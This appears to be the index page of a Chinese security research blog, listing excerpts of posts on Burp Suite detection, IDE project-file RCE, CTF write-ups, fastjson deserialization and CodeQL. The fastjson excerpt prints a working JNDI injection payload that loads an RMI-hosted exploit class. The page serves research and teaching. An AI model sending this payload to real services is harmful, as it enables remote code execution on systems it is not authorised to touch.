Burpsuite 特征识别及其对抗措施

发表于 2022 年 8 月 14 日

某日, 我的同学突然 @crane 问我有没有能检测 burp 的方法. 突然想起来之前就看见过别人的 burp 被拦截, 但是当时测试下来由于我的 burp 不会被拦截, 所以就没有太在意. 现在回想起来有点在意为什么会出现这种检测上的选择性, 于是刚好学习一下相关方法了解原因.

阅读全文 »

利用项目配置文件进行 RCE - IDE Trust Project 功能探究

发表于 2021 年 10 月 2 日

最近发现在打开 IDEA, VSCode 项目时候, 都增加了 “信任此项目的提示”. 结合这些 IDE 的特点, 确实可能存在在打开项目时产生 RCE 的风险, 特别是进行代码审计的安全人员, 会经常打开未知的项目. 正常人肯定不会贸然的执行未知的代码, 但是对于打开项目时这个弹出的框框, 可能并不会特别在意. 接下来分析一些通过这些配置来进行 RCE 的方法.

阅读全文 »

hxp CTF resonator Writeup - SSRF via file_put_contents

发表于 2020 年 12 月 30 日

题目简介

在刚结束的 hxpCTF 中出现了一题跟 🍊 的 One line php challenge 一样短小精悍但非常有趣的题目. 长度只有五行,

阅读全文 »

2020 CISCN 华东北赛区 WEB Writeup

发表于 2020 年 9 月 19 日

一共 6 题 WEB, 我一个人拿了 4 个一血, 还有一题全场 0 解. 然而没有 pwn 爷爷依旧被吊打, 而且题目质量是真的差, 明年再打国赛我是傻逼.

阅读全文 »

DDCTF 2020 Writeup

发表于 2020 年 9 月 7 日

今年改了赛制, 可以两人组队, 我觉得改的还是不错的, 终于不用现场表演学习逆向和 pwn 了, 成功和 Ary 师傅打到了第三 233

阅读全文 »

TCTF/0CTF 2020 Writeup

发表于 2020 年 6 月 29 日

又是一年 0CTF, 这次一个人一队单刷一次, 做出了两题 WEB, 可惜只输出了一天, 第二天还要赶 ddl, 还是太蔡了 orz

阅读全文 »

fastjson 1.2.68 反序列化漏洞 gadgets 挖掘笔记

发表于 2020 年 6 月 12 日

以此祭奠找 gadgets 逝去的青春, orz

阅读全文 »

Codeql 踩坑记录 (二)

发表于 2020 年 3 月 31 日

首先需要解决的就是上次留下的问题, 添加自定义的 taint track.
在自带的 tests 中就有示例, 可以参考 ql/python/ql/test/library-tests/taint/extensions/ExtensionsLib.qll

阅读全文 »

Codeql 踩坑记录

发表于 2020 年 3 月 30 日

阅读全文 »

fastjson RCE 分析

发表于 2020 年 2 月 1 日

简介

先看经典 payload

1{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}

阅读全文 »